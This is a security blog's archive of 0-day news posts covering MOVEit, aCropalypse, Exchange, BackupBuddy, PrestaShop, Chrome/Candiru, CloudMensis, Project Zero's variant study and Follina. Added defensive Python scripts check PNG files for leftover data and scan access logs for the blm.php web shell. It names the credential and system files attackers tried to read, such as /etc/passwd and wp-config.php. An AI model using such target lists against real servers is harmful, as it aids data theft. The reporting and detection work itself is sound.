0-day Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/0-day/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Thu, 28 Dec 2023 22:13:26 +0000

MOVEit Transfer Fixes a New Critical Vulnerability
https://gridinsoft.com/blogs/vulnerability-moveit-transfer/
Tue, 11 Jul 2023 12:38:43 +0000

The post MOVEit Transfer Fixes a New Critical Vulnerability appeared first on Gridinsoft Blog.

After hundreds of companies were attacked with a 0-day vulnerability in MOVEit Transfer, the developer of this file transfer management product, Progress Software, promised to regularly release patches to provide a “predictable, simple, and transparent bug fixing process.” The first such package included patches for three vulnerabilities, including a critical one.

MOVEit Vulnerabilities – The Post-Factum View

This story started with a 0-day vulnerability (CVE-2023-34362) in MOVEit Transfer, which was discovered in early June 2023. All versions of MOVEit Transfer were affected by the problem. Researchers say that attacks exploiting this vulnerability began as early as May 27, 2023.

Attackers used this vulnerability to deploy custom web shells on affected servers. This allowed them to list files stored on the server, download them, and steal account credentials and secrets. The latter included the AzureBlobStorageAccount, AzureBlobKey, and AzureBlobContainer settings. Put simply, the attacks exploiting this vulnerability were in fact a sophisticated SQL injection; what made them unusual was the way the database was reached, namely through the 0-day flaw itself.

As a result, Microsoft analysts linked the massive attacks to the Cl0p ransomware hack group (aka Lace Tempest, TA505, FIN11, or DEV-0950). Soon the hackers began to make demands, extorting ransoms from the affected companies. At the moment, according to Emsisoft experts, the number of victim companies exceeds 230: at least 20 schools in the US and dozens of universities around the world were affected. In total, the leaks exposed information about 17-20 million people.

MOVEit MFT Vulnerabilities Receive a Fix

MOVEit products, including MOVEit Transfer and MOVEit Automation, will receive service packs from Progress Software. The first one has already received a patch that fixes a critical SQL injection. It also contains fixes for two other, less serious vulnerabilities.

The critical issue has been identified as CVE-2023-36934 by the Trend Micro Zero Day Initiative. The developers report that it can be used without authentication, allowing an attacker to gain unauthorized access to the MOVEit Transfer database.

“An attacker could send a specially crafted payload to the MOVEit Transfer application endpoint, which could modify and expose the contents of the MOVEit database,” reads the official security bulletin.

There are currently no reports of active exploitation of this flaw by hackers. The second vulnerability is also a SQL injection and received the identifier CVE-2023-36932. Hackers can actively use this one once they have managed to bypass authentication. Both SQL injections affect multiple versions of MOVEit Transfer, including 12.1.10 and later, 13.0.8 and later, 13.1.6 and later, 14.0.6 and later, 14.1.7 and later, and 15.0.3 and later.

The third issue addressed by this month's patches was the CVE-2023-36933 vulnerability. This flaw allows attackers to make the program terminate unexpectedly. The bug is present in MOVEit Transfer versions 13.0.8 and later, 13.1.6 and later, 14.0.6 and later, 14.1.7 and later, and 15.0.3 and later. The company recommends that its clients install the updates for their versions, as listed in the table below.

Vulnerable versions                 | Corrected version                 | Documentation             | Release Notes
------------------------------------|-----------------------------------|---------------------------|---------------------------
MOVEit Transfer 2023.0.x (15.0.x)   | MOVEit Transfer 2023.0.4 (15.0.4) | MOVEit 2023 Upgrade       | MOVEit Transfer 2023.0.4
MOVEit Transfer 2022.1.x (14.1.x)   | MOVEit Transfer 2022.1.8 (14.1.8) | MOVEit 2022 Upgrade       | MOVEit Transfer 2022.1.8
MOVEit Transfer 2022.0.x (14.0.x)   | MOVEit Transfer 2022.0.7 (14.0.7) | MOVEit 2022 Upgrade       | MOVEit Transfer 2022.0.7
MOVEit Transfer 2021.1.x (13.1.x)   | MOVEit Transfer 2021.1.7 (13.1.7) | MOVEit 2021 Upgrade       | MOVEit Transfer 2021.1.7
MOVEit Transfer 2021.0.x (13.0.x)   | MOVEit Transfer 2021.0.9 (13.0.9) | MOVEit 2021 Upgrade       | MOVEit Transfer 2021.0.9
MOVEit Transfer 2020.1.6+ (12.1.6)  | Special Service Pack available    | MOVEit Transfer 2020.1SP  | MOVEit Transfer 2020.1.7
MOVEit Transfer 2020.0.x+ (12.0.x)  | Update to a supported version     | Upgrade/Migration Guide   | N/A

The aCropalypse Vulnerability Poses a Threat Not Only to Pixel, but Also to Windows
https://gridinsoft.com/blogs/acropalypse-vulnerability-for-windows/
Fri, 24 Mar 2023 12:32:48 +0000

Information security experts have discovered that the aCropalypse vulnerability, which allows restoring the original image edited on a Google Pixel device (using the Markup tool), is turning into a 0-day for Windows.

Let me remind you that we also wrote that YouTube Video Causes Pixel Smartphones to Reboot, and also that Information Security Specialists Discovered a 0-day Vulnerability in Windows Search.

Information security specialists also reported that a Google Pixel bug prevented users from calling 911.

It turned out that the aCropalypse bug also works for images cropped using the Windows Snipping Tool, which means that previously deleted content can also be restored for these images.

[Image: aCropalypse vulnerability for Windows. Caption: Restoring a shaded bank card number]

The aCropalypse vulnerability (CVE-2023-21036) was discovered by cybersecurity experts Simon Aarons and David Buchanan. It allows restoring any images modified using the built-in Markup screenshot editor, which appeared on Pixel smartphones in 2018 with the release of Android 9.0 Pie.

In the case of the Pixel, the problem lies in how the image file is opened for editing: the cropped data still remains in the new saved image, allowing about 80% of the original image to be restored.

[Image: aCropalypse vulnerability for Windows]

The researchers warned that aCropalypse could expose users’ sensitive information if they had once edited an image with Markup and then shared the file with other people or even posted it online.

Because some platforms don’t compress user-uploaded media, the sensitive data contained in the images may have been left untouched and stored somewhere online all these years. In this light, the example given by Aarons with the blurred bank card number shown above is very revealing.

It looks like the aCropalypse issue has gotten a lot worse now, as programmer Chris Blume has discovered that the vulnerability also affects the Windows Snipping Tool.

When you open a file in the Snipping Tool and overwrite the existing file, the same thing happens as in Markup: instead of truncating the unused data, the tool leaves the unused data at the end of the file, which ultimately allows the original to be partially restored.

Bleeping Computer and well-known information security expert Will Dormann confirm that the vulnerability actually works in Windows 10 and 11. Dormann suggested a simple test: copy any image (to have a backup), then open it with the Snipping Tool and crop it to a much smaller size. Save the file and compare the sizes of the cropped and original files. As you can see in the screenshot below, the file sizes are the same.

[Image: aCropalypse vulnerability for Windows]

Bleeping Computer journalists went even further. They note that the PNG file specification requires that a PNG image file always ends with an “IEND” chunk, and that any data appended after it is ignored by image editors and viewers. The unused data remains in the file after IEND.
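The observation above (the cropped file keeps its original size, and the leftover bytes sit after IEND) can be turned into a check that a defender can run over a folder of screenshots before sharing them. The following script is an added example, not code from the original post and not Buchanan's recovery script: it walks the PNG chunk list, verifies each chunk's CRC, stops at IEND and reports how many bytes follow it. It builds its own sample image in memory and models the in-place overwrite the post describes, so it runs offline; the function names (`png_chunks`, `trailing_bytes_after_iend`, `make_sample_png`, `simulate_in_place_overwrite`) are my own. It only measures the leftover tail and does not attempt to reconstruct anything.

```python
import random
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunks(data: bytes):
    """Yield (chunk_type, payload, end_offset) for each chunk, stopping after IEND.

    Raises ValueError for a missing signature, a truncated chunk, a CRC
    mismatch, or a file that never reaches an IEND chunk.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file (bad signature)")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length + 4  # 8-byte header + payload + 4-byte CRC
        if end > len(data):
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError(f"CRC mismatch in chunk {ctype!r} at offset {pos}")
        yield ctype, payload, end
        pos = end
        if ctype == b"IEND":
            return
    raise ValueError("no IEND chunk found")


def trailing_bytes_after_iend(data: bytes) -> int:
    """Number of bytes after the IEND chunk; 0 means the file has no leftover tail."""
    end_of_iend = 0
    for _ctype, _payload, end in png_chunks(data):
        end_of_iend = end
    return len(data) - end_of_iend


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_sample_png(width: int, height: int) -> bytes:
    """Constructed sample: 8-bit RGB image with seeded pseudo-random pixels.

    Random pixel data keeps IDAT close to its raw size, so a large original is
    guaranteed to be longer than a small crop (the situation the post describes).
    """
    rng = random.Random(1234)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    rows = []
    for _ in range(height):
        # filter byte 0 (None) followed by width*3 pixel bytes
        rows.append(b"\x00" + bytes(rng.getrandbits(8) for _ in range(3 * width)))
    idat = zlib.compress(b"".join(rows))
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def simulate_in_place_overwrite(original: bytes, replacement: bytes) -> bytes:
    """Model the bug in the post: the new, smaller file is written over the old one
    without truncating it, so the old file's tail survives past the new IEND."""
    return replacement + original[len(replacement):]


if __name__ == "__main__":
    original = make_sample_png(64, 64)
    cropped = make_sample_png(4, 4)
    leaky = simulate_in_place_overwrite(original, cropped)
    print("original:   ", len(original), "bytes, tail after IEND:", trailing_bytes_after_iend(original))
    print("overwritten:", len(leaky), "bytes, tail after IEND:", trailing_bytes_after_iend(leaky))
```

On real files, `trailing_bytes_after_iend(open(path, "rb").read())` returning a non-zero value means the file carries data that viewers ignore; as the post notes below, re-saving the image from a graphics editor to a new file drops that tail. A CRC error or missing IEND is reported separately, since a corrupt file is a different problem from a leaky one.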

After all the manipulations described above, the journalists decided to “see” this data.

Since the acropalypse.app online application does not work with Windows files, David Buchanan shared with the publication a Python script that can be used to restore Windows files. The successful result of this script, which the expert does not intend to make public yet, can be seen below.

[Image: aCropalypse vulnerability for Windows]

It is noted that not all PNG files are affected by this problem, and not all originals for all files can be completely restored.

“Your original PNG was saved with one zlib block (usually for “optimized” PNGs), but real screenshots are saved with multiple zlib blocks (which is required for my exploit to work),” Buchanan told reporters.

In addition, opening a PNG file in a graphics editor (such as Photoshop) and saving it as another file will delete the unused data at the end, after which it cannot be recovered.

It is worth saying that the Snipping Tool works exactly the same with JPG files, saving the “cropped” data when overwritten. However, Buchanan says that his exploit does not yet work with JPGs, although recovery of such images is most likely possible.

Microsoft representatives told the media that they are already aware of this problem. The company is currently investigating the matter, and it promises it will “take steps to protect customers if necessary.”

Another 0-Day Bug Was Found in Microsoft Exchange, and LockBit Ransomware Operators Are Exploiting It
https://gridinsoft.com/blogs/0-day-in-microsoft-exchange/
Fri, 14 Oct 2022 09:09:51 +0000

Although Microsoft still hasn’t fixed the ProxyNotShell vulnerabilities found in Exchange last month, the company is now investigating a report of a new 0-day bug that is being used to compromise Exchange servers. Hackers are exploiting this bug to deploy the LockBit ransomware.

Let me remind you that we also wrote that ProxyToken Vulnerability Allows Stealing Mail Through Microsoft Exchange, and also that FBI removed web shells from vulnerable Microsoft Exchange servers without informing owners.

The South Korean company AhnLab warned that hackers abused another 0-day vulnerability. Researchers report that they are aware of at least one incident that occurred in July 2022, when attackers used a previously deployed web shell on an Exchange server to elevate privileges to the Active Directory administrator level, stole 1.3 TB of data, and encrypted the victim company's systems.

Experts who investigated the incident write that it took the attackers just a week to capture the Active Directory administrator account. At the same time, the Exchange server appears to have been compromised using some kind of “undisclosed zero-day vulnerability”, although the victim company received technical support from Microsoft and regularly installed security updates after another compromise that took place in December 2021.

“Among the vulnerabilities disclosed after May of this year, there were no reports of vulnerabilities related to the execution of remote commands or the creation of files. So given that the web shell was created on July 21, it looks like the attackers exploited an undisclosed zero-day vulnerability,” the experts explain.

At the same time, AhnLab is not sure that the criminals did not exploit the already mentioned ProxyNotShell vulnerabilities, although the attack tactics were completely different.

“Perhaps, vulnerabilities in Microsoft Exchange Server (CVE-2022-41040, CVE-2022-41082) discovered by the Vietnamese information security company GTSC on September 28 were used here, but the attack method, the generated web shell file name and subsequent attacks after creation do not match web shell. We believe that other attackers exploited a different zero-day vulnerability,” the researchers say.

Although AhnLab experts are not completely sure, it is worth noting that information security specialists are aware of at least three more undisclosed vulnerabilities in Exchange. So, last month, experts from the Zero Day Initiative told Microsoft that they discovered three problems in Exchange at once, which they track under the identifiers ZDI-CAN-18881, ZDI-CAN-18882 and ZDI-CAN-18932. Following this, in early October, Trend Micro added signatures for three critical Microsoft Exchange zero-day vulnerabilities to its N-Platform, NX-Platform, or TPS security products.

So far, Microsoft has not disclosed any information about these three bugs, and they have not yet been assigned CVE IDs.

0-day Vulnerability in WordPress BackupBuddy Plugin Attacked Over 5 million Times
https://gridinsoft.com/blogs/0-day-vulnerability-in-wordpress/
Tue, 13 Sep 2022 13:51:26 +0000

Wordfence analysts have discovered that a fresh 0-day vulnerability in the popular WordPress plugin, BackupBuddy, which has been installed about 140,000 times, is under active attack. Since August 26, 2022, there have been about 5,000,000 hack attempts.

The BackupBuddy plugin allows users to back up their entire WordPress installation right from the dashboard, including theme files, pages, posts, widgets, users, media files and so on.

Let me remind you that we also talked about Ukraine Was Hit by DDoS Attacks from Hacked WordPress Sites, and also that About 30% of critical vulnerabilities in WordPress plugins remain unpatched.

The 0-day vulnerability has been identified as CVE-2022-31474 (CVSS 7.5) and affects BackupBuddy versions 8.5.8.0 through 8.7.4.1. The problem was fixed in early September, with the release of version 8.7.5.

The researchers explain that the bug allows unauthorized parties to download arbitrary files from the vulnerable site that may contain sensitive information. It is known that the problem is related to the Local Directory Copy function, which is designed to store a local copy of backups.

“This vulnerability allows an attacker to view the contents of any file on the server that your WordPress installation can access. This can be the WordPress wp-config.php file or, depending on the server settings, confidential files such as /etc/passwd,” the experts warn.

According to Wordfence, the attacks on CVE-2022-31474 began on August 26, 2022, and since that date, nearly five million hack attempts have been recorded. Most hackers tried to read the following files:

  1. /etc/passwd
  2. /wp-config.php
  3. .my.cnf
  4. .accesshash

BackupBuddy users are now strongly advised to update the plugin to the latest version. Users who believe they may have been compromised are advised to immediately reset the database password and to change the WordPress salts and any API keys stored in wp-config.php.

Stores Are under Attack due to 0-Day Vulnerability in PrestaShop
https://gridinsoft.com/blogs/0-day-vulnerabilities-in-prestashop/
Wed, 27 Jul 2022 13:01:34 +0000

Hackers are exploiting a 0-day vulnerability in the open-source e-commerce platform PrestaShop to inject web skimmers, designed to steal sensitive information, into websites.

Last Friday, the PrestaShop team issued an urgent warning, urging the administrators of the approximately 300,000 stores using the software to be more vigilant about security as attacks were discovered targeting the platform.

Let me remind you that we also wrote that New web skimmer found in Shopify, BigCommerce, Woocommerce and Zencart stores, and also that Dutch shops run out of cheese due to a ransomware attack.

Apparently, the attacks affected PrestaShop version 1.6.0.10 or later, as well as version 1.7.8.2 or later, but only when running a module vulnerable to SQL injection, for example, Wishlist 2.0.0-2.1.0.

“We believe that attackers are targeting stores using outdated software and modules, vulnerable third-party modules, or some yet undetected vulnerability,” the experts write.

Typically, such attacks start with the hackers sending a POST request to the vulnerable endpoint, followed by a parameterless GET request to the home page, which creates a blm.php file in the root directory. This file is a web shell and allows attackers to remotely execute commands on the server.

In many cases, attackers have been known to use this web shell to inject a fake payment form into the checkout page (web skimmer) and steal customer payment card details. After the attack, the hackers covered their tracks so that the site owner would not realize that the resource had been hacked.

PrestaShop developers say that traces of a compromise can still be found if hackers are not too zealous in destroying evidence. For example, traces of criminals can be found in the web server access logs, file modifications to add malicious code can be seen, as well as the activation of the MySQL Smarty cache, which is part of the attack chain. This feature is disabled by default, but the researchers say the hackers turned it on themselves and recommend removing it altogether if it’s not needed.
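The two traces the post describes, the POST-then-parameterless-GET sequence that precedes the creation of blm.php and the later requests to that file, can both be looked for in the web server access log. The script below is an added example, not the PrestaShop team's code: it parses combined-format access log lines and reports both indicators per client IP. The log lines are constructed for the example (documentation-range IPs, a placeholder module path); the function names `parse_line` and `find_indicators` are my own.

```python
import re
from collections import defaultdict

# Apache/Nginx "combined" access-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log. 203.0.113.7 follows the sequence described in the post;
# 198.51.100.5 is ordinary shopper traffic. The module path is a placeholder.
SAMPLE_LOG = """\
198.51.100.5 - - [22/Jul/2022:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Jul/2022:10:00:05 +0000] "POST /module/examplemodule/action HTTP/1.1" 200 312 "-" "curl/7.79"
203.0.113.7 - - [22/Jul/2022:10:00:06 +0000] "GET / HTTP/1.1" 200 5120 "-" "curl/7.79"
203.0.113.7 - - [22/Jul/2022:10:00:09 +0000] "GET /blm.php HTTP/1.1" 200 12 "-" "curl/7.79"
198.51.100.5 - - [22/Jul/2022:10:01:00 +0000] "POST /cart HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.5 - - [22/Jul/2022:10:01:02 +0000] "GET /cart HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Return the fields of one access-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_indicators(lines):
    """Return sorted (line_no, ip, reason) tuples for the two indicators in the post.

    1. any request whose path is the web shell file blm.php (strong indicator);
    2. a POST from a client immediately followed by a parameterless GET of the
       home page from the same client (weak, noisy indicator; use for triage).
    """
    by_ip = defaultdict(list)
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].split("?", 1)[0].endswith("/blm.php"):
            hits.append((n, rec["ip"], "request for web shell file blm.php"))
        by_ip[rec["ip"]].append((n, rec))
    for ip, seq in by_ip.items():
        for (n1, a), (n2, b) in zip(seq, seq[1:]):
            if a["method"] == "POST" and b["method"] == "GET" and b["path"] == "/":
                hits.append((n2, ip, f"POST {a['path']} (line {n1}) followed by parameterless GET /"))
    return sorted(hits)


if __name__ == "__main__":
    for line_no, ip, reason in find_indicators(SAMPLE_LOG.splitlines()):
        print(f"line {line_no}: {ip}: {reason}")
```

The blm.php hit is the one worth acting on immediately; the POST-then-GET sequence also matches ordinary form submissions followed by a visit to the home page, so it is only useful to narrow down which clients to inspect, together with the file modification times and the Smarty cache setting the post mentions.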

All store administrators are advised to install the latest security update (PrestaShop version 1.7.8.7) as soon as possible, and to update all the modules they use to their latest versions.

At the same time, PrestaShop maintainers emphasize that they discovered and fixed a zero-day vulnerability in the new version, but they “cannot be sure that this is the only way to carry out attacks.” The discovered vulnerability received the identifier CVE-2022-36408.

Chrome 0-day Vulnerability Used to Attack Candiru Malware
https://gridinsoft.com/blogs/0-day-vulnerability-in-chrome/
Mon, 25 Jul 2022 09:24:34 +0000

Avast has discovered that DevilsTongue spyware, created by Israeli company Candiru, exploited a 0-day vulnerability in Google Chrome to spy on journalists and others in the Middle East.

The vulnerability in question is the CVE-2022-2294 bug, which was fixed by Google and Apple engineers earlier this month.

Let me remind you that we also wrote that SpookJS Attack Allows to Bypass Site Isolation In Google Chrome.

The vulnerability in question is a heap buffer overflow in the WebRTC component and was first reported by information security expert Jan Vojtěsek from the Avast Threat Intelligence team. Even then, it was known that the bug was being exploited in real attacks, but no details were disclosed.

As Avast experts now say, the vulnerability was discovered after investigating a spyware attack on one of the company’s customers. According to experts, Candiru started using CVE-2022-2294 back in March 2022, attacking users in Lebanon, Turkey, Yemen and Palestine.

Spyware operators used the standard watering hole tactic for such campaigns. This term refers to attacks that are built by analogy with the tactics of predators who hunt at a watering hole, waiting for prey – animals that have come to drink. This usually means that attackers inject malicious code onto legitimate sites, where it waits for victims.

In this case, by compromising the site, the hackers expected that it would be visited by their targets using a browser vulnerable to CVE-2022-2294. In one case, the website of an unnamed Lebanese news agency was hacked and injected with JavaScript, allowing XSS attacks and redirecting the victim to a server with exploits.

[Image: 0-day vulnerability in Chrome]

The attack was particularly nasty in that it did not require any interaction with the victim (such as clicking on a link or downloading something). To compromise, it was enough to simply open a malicious site in Google Chrome or another Chromium-based browser (including Edge, as well as Safari, since the vulnerability was related to WebRTC).

To make sure they attack only the right people, the hackers created victim profiles by collecting a lot of data, including information about the victim’s system language, time zone, screen size, device type, browser plugins, device memory, cookies, and more.

It is also noted that in the case of the Lebanese attacks, the 0-day not only allowed the attackers to execute shellcode inside the rendering process, but was additionally chained with some kind of sandbox escape vulnerability that Avast was unable to recreate for analysis.

When the DevilsTongue malware finally infiltrated the victim’s system, it tried to elevate privileges by installing a Windows driver containing another unpatched vulnerability. Thus, the total number of 0-day bugs involved in this campaign was at least three.

Once the driver was installed, DevilsTongue used a security hole in it to gain access to the kernel, the most sensitive part of any OS. Researchers call this attack method BYOVD (bring your own vulnerable driver). It allows malware to bypass OS protections, since most drivers automatically have access to the OS kernel.

“We don’t know exactly what the attackers may have been after, but attackers often target journalists to spy on them and the material they are working on, or to get to their sources, as well as to collect compromising evidence and confidential data that they shared with press,” Avast experts say.

Let me remind you that the DevilsEye spyware, which was developed by the Israeli company Candiru and then sold to the governments of different countries, was described in detail by Microsoft specialists last year. Even then, it was known that politicians, human rights activists, activists, journalists, scientists, embassies and political dissidents in various countries of the world were targeted by this malware.

CloudMensis Malware Attacks MacOS Users
https://gridinsoft.com/blogs/cloudmensis-malware-for-macos/
Wed, 20 Jul 2022 10:33:14 +0000

ESET experts have discovered the CloudMensis malware, which is used to create backdoors on devices running macOS and subsequently steal information.

The malware received its name due to the fact that it uses pCloud, Dropbox and Yandex.Disk cloud storages as control servers.

Let me remind you that we also wrote that Vulnerability in macOS Leads to Data Leakage, and also that Microsoft Releases PoC Exploit to Escape MacOS Sandbox.

The capabilities of CloudMensis indicate that the main goal of its operators is to collect confidential information from infected machines. For example, the malware is capable of taking screenshots, stealing documents, intercepting keystrokes, and compiling lists of emails, attachments, and files stored on removable media.

CloudMensis supports dozens of different commands, which allows its operators to perform a variety of actions on infected machines:

  1. change, in the malware configuration, the cloud storage provider and authentication tokens, the file extensions of interest, the frequency of polling the cloud storage, and so on;
  2. list running processes;
  3. capture the screen;
  4. list emails and attachments;
  5. list files on removable media;
  6. run shell commands and upload the result to the cloud storage;
  7. download and execute arbitrary files.

According to ESET analysis, attackers infected the first Mac as early as February 4, 2022. Since then, they have only occasionally used the backdoor to compromise other machines, hinting at the targeted nature of this campaign.

[Image: CloudMensis malware for macOS]

Interestingly, once deployed, CloudMensis is able to bypass the Transparency, Consent and Control (TCC) system, which asks users whether to grant an app permission to take screenshots or monitor keystrokes. The TCC mechanism is designed to block access to sensitive user data, allowing macOS users to customize privacy settings for various applications and devices (including microphones and cameras).

Rules created by the user are stored in a database protected by System Integrity Protection (SIP), which ensures that only the TCC daemon can modify them. Thus, if a user has disabled SIP on the system, CloudMensis will grant itself the necessary permissions by simply adding new rules to TCC.db.

However, even if SIP is enabled and any version of macOS Catalina prior to 10.15.6 is installed on the machine, CloudMensis can still gain the necessary rights by exploiting a vulnerability in CoreFoundation, which has the identifier CVE-2020-9934 and which Apple fixed two years ago. This bug forces the TCC daemon (tccd) to load a database that CloudMensis can write to.

The vector of infection, as well as the goals of the hackers, are still unknown, but the researchers write that, judging by the way the attackers handle Objective-C, they are practically unfamiliar with macOS. At the same time, experts admit that CloudMensis is still a powerful spy tool that can pose a serious threat to potential victims.

“The use of vulnerabilities to bypass defense mechanisms indicates that malware operators are actively trying to maximize the success of their spying operations. At the same time, our study did not find any 0-days used by this group,” experts say.

0-Day Vulnerabilities of 2022 Repeat the Mistakes of Past Years
https://gridinsoft.com/blogs/0-day-vulnerabilities-2022/
Tue, 05 Jul 2022 09:54:15 +0000

Google Project Zero researcher Maddie Stone published a study on 0-day vulnerabilities in 2022 on GitHub called “0-day In-the-Wild Exploitation in 2022…so far”.

According to Stone, 9 of the 18 exploited zero-day vulnerabilities are variants of previously patched vulnerabilities.

“Half of the 0-day flaws could have been prevented with more comprehensive fixes and regression tests. In addition, four of the 2022 vulnerabilities are variants of the 2021 0-day bugs,” Stone wrote in a blog post.

In many cases, the attacks were not sophisticated, and the attacker could have exploited the vulnerability in another way. For example, the recently discovered Follina vulnerability in Windows (CVE-2022-30190) is a variant of the MSHTML bug CVE-2021-40444.

Let me remind you that we wrote about “Russian Hackers Use Follina Vulnerability to Attack Users in Ukraine”, as well as “Microsoft Fixed Follina Vulnerability and 55 Other Bugs”.

Stone describes how the incomplete fixes played out. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution path taken by the proof-of-concept exploit was patched, but the root cause was not addressed, so the attackers were able to come back and trigger the original vulnerability through a different path.

In the case of the WebKit and Windows PetitPotam issues, the original vulnerability had been patched earlier but at some point regressed, so attackers could exploit the same bug again. In the iOS IOMobileFrameBuffer case, a buffer overflow was addressed by checking that a size was smaller than a certain number, without checking a minimum bound on that size.
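The “upper bound only” size check described for IOMobileFrameBuffer is a pattern worth seeing concretely, together with the boundary regression test that would have caught it before it shipped. The Python below is an added illustration written for this page, not Apple's code or anything from the Project Zero post; FB_MAX and the two check functions are hypothetical stand-ins, and ctypes is used only to show what a C caller sees once a signed 32-bit size is converted to size_t.

```python
import ctypes

# Hypothetical maximum for the illustration; the real IOMobileFrameBuffer
# limit and code are not reproduced here.
FB_MAX = 4096


def incomplete_check(size):
    """The 'upper bound only' fix pattern: rejects sizes above FB_MAX but
    never asks whether size is negative."""
    return size <= FB_MAX


def complete_check(size):
    """Both bounds: a size must be non-negative and no larger than FB_MAX."""
    return 0 <= size <= FB_MAX


def as_size_t(size):
    """The length a C memcpy would actually receive: a signed 32-bit size
    converted to size_t, so -1 becomes the largest possible length."""
    return ctypes.c_size_t(ctypes.c_int32(size).value).value


def boundary_cases():
    """Edge values a regression test for a bounds check should cover:
    the signed extremes, -1, zero, the limit itself and one past it."""
    return [-(2 ** 31), -1, 0, 1, FB_MAX, FB_MAX + 1, 2 ** 31 - 1]


def regression_failures(check):
    """Boundary values that `check` accepts but that would still hand the
    copy more than FB_MAX bytes. An empty list means the check holds on
    every edge case; anything else is the variant waiting to happen."""
    return [s for s in boundary_cases() if check(s) and as_size_t(s) > FB_MAX]


if __name__ == "__main__":
    for name, check in (("incomplete", incomplete_check), ("complete", complete_check)):
        print(name, "check accepts unsafe sizes:", regression_failures(check))
```

Running it shows the incomplete check accepting -2147483648 and -1, both of which become enormous once they reach the copy; the complete check accepts none of the edge cases it should reject. A test of this shape, kept alongside the original fix, is exactly the regression coverage Stone argues would have prevented half of the year's in-the-wild 0-days.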

In the Project Zero post, Stone lists several 2022 0-days alongside the previously patched bugs they are variants of.

(Image: 0-day vulnerabilities 2022 and their variants)

To handle 0-days properly, the Project Zero researchers recommend investing in root cause analysis, variant analysis, patch analysis, and exploit technique analysis, so that a fix closes the underlying bug and every path to it rather than just the one path a proof-of-concept exploit happened to take.

“Sharing research helps the industry as a whole. We publish our analyses in this repository. We encourage vendors and others to publish them as well. This will allow developers and security professionals to better understand what attackers already know about these bugs. Sharing information will lead to better security overall,” Stone concluded.

Microsoft Is in No Hurry to Fix the Follina Vulnerability, Which Has Become a Real Disaster
https://gridinsoft.com/blogs/microsoft-is-in-no-hurry-to-fix-follina/ (Thu, 09 Jun 2022 13:35:21 +0000)

Hackers are actively exploiting the critical 0-day Follina vulnerability, which Microsoft is in no hurry to fix.

Researchers warn that European governments and municipalities in the US have been targeted by a phishing campaign using malicious RTF documents.

Let me remind you that Follina became public at the end of May 2022, although researchers had first reported the bug to Microsoft back in April 2022; at the time, Microsoft declined to acknowledge it as a problem.

The vulnerability is tracked as CVE-2022-30190. It allows arbitrary code execution when a crafted Word document is opened normally, or merely previewed in File Explorer: the document references an external HTML page that invokes the ms-msdt: URL handler, and the Microsoft Support Diagnostic Tool (MSDT) then executes attacker-supplied PowerShell commands.

The bug affects all versions of Windows that receive security updates, i.e. Windows 7 and later, as well as Server 2008 and later.

Worse, the vulnerability has been compared to PrintNightmare, which Microsoft took a long time to fix properly. Like PrintNightmare, Follina has led to the discovery of related bugs whose exploitation could be no less serious.

We have already written that Chinese hackers are actively exploiting the fresh 0-day, and experts warned that more such attacks would follow soon. Unfortunately, that prediction has come true: Proofpoint analysts now report a phishing campaign aimed at government agencies in Europe and municipal authorities in the United States that hit at least 10 of the company's customers. According to the experts, state-sponsored hackers are behind these attacks.

To lure victims into opening the decoy document, the attackers used the theme of a pay rise. Opening the document deployed a PowerShell script that first checked whether it was running in a virtual machine, then stole information from multiple browsers, email clients and file-transfer services, collected system information, and sent the data to a server controlled by the attackers.


According to Bleeping Computer, the payload collected a lot of data from a wide variety of applications, including:

  1. passwords from browsers: Google Chrome, Mozilla Firefox, Microsoft Edge, Opera, Yandex, Vivaldi, CentBrowser, Comodo, CheDot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc and AVAST Browser;
  2. data from other applications: Mozilla Thunderbird, Netsarang session files, Windows Live Mail contacts, Filezilla passwords, ToDesk configuration file, WeChat, Oray SunLogin RemoteClient, MailMaster, ServU, Putty, FTP123, WinSCP, RAdmin, Microsoft Office, Navicat;
  3. system information: computer information, list of usernames, Windows domain information.

Most of the attacks are reported to have been in the United States, as well as Brazil, Mexico and Russia.

Since there is still no patch for Follina, administrators and users can block attacks on CVE-2022-30190 by disabling the ms-msdt: URL protocol handler, which the exploit uses to launch MSDT and execute code on vulnerable systems; Microsoft's guidance is to back up and then delete the HKEY_CLASSES_ROOT\ms-msdt registry key. Microsoft also recommends disabling the preview pane in Windows Explorer, because previewing a file is enough to trigger the attack.


In the absence of an official patch, an unofficial one has already appeared, from 0patch. Let me remind you that 0patch is a platform designed just for such situations, that is, fixing 0-day and other unpatched vulnerabilities, to support products that are no longer supported by manufacturers, custom software, and so on.

Unofficial patches are provided for Windows 11 v21H2, Windows 10 (1803 to 21H2), Windows 7 and Windows Server 2008 R2. Moreover, instead of disabling MSDT as Microsoft recommends, 0patch added sanitization of the user-supplied path, which also prevents the bug from being exploited.

